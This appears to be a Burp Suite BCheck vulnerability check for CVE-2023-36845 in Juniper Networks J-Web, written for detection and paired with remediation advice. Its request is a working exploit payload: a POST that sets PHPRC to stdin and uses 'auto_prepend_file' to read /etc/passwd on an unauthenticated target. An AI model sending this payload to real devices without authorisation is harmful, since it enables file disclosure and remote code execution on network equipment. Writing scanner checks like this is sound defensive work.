CVE-2023-36845 Juniper Networks - PHP External Variable Modification.bcheck

#https://vulncheck.com/blog/juniper-cve-2023-36845
metadata:
    language: v1-beta
    name: "CVE-2023-36845 Juniper Networks - PHP External Variable Modification"
    author: "Joao Paulo Assis (j0hnZ3RA)"
    description: "Check for CVE-2023-36845."
    tags: "CVE-2023-36845"

define:
    target_path = "/?PHPRC=/dev/fd/0"

given host then
    send request called check:
        method: "POST"
        replacing headers:
            "Content-Type": "application/x-www-form-urlencoded"
        path: {target_path}
        body: "auto_prepend_file=\"/etc/passwd\""

        if {check.response.status_code} is "200" and "root" in {check.response.body} and "Juniper" in {check.response.body} then
            report issue:
                severity: high
                confidence: certain
                detail: "A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code. Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code."
                remediation: "Upgrade Juniper SRX firewalls and EX switches to the latest version"
        end if